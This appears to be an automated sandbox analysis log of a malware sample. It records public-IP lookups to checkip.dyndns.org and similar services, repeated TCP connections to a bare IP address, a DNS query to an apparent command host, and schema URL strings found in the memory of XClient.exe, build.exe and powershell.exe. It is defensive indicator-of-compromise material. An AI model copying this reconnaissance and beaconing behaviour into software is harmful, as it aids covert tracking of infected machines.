Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49726 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s82.gocheapweb.com

Source: XClient.exe, 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: XClient.exe, 00000008.00000002.2652391836.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: XClient.exe, 00000008.00000002.2939204623.000000001CBE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000015.00000002.2440580554.000001E8C45F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsG
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: powershell.exe, 00000015.00000002.2419525298.000001E8BC113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: build.exe, 00000009.00000002.2622931555.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2927137244.000000001B830000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: XClient.exe, 00000008.00000002.2936268568.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2927137244.000000001B830000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2645832584.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000008.00000002.2652391836.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000015.00000002.2349952614.000001E8AC2C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: XClient.exe, 00000008.00000002.2652391836.0000000002BAD000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 00000009.00000002.2623500553.0000000002931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: XClient.exe, 00000008.00000002.2652391836.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000009.00000002.2623500553.00000000029C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
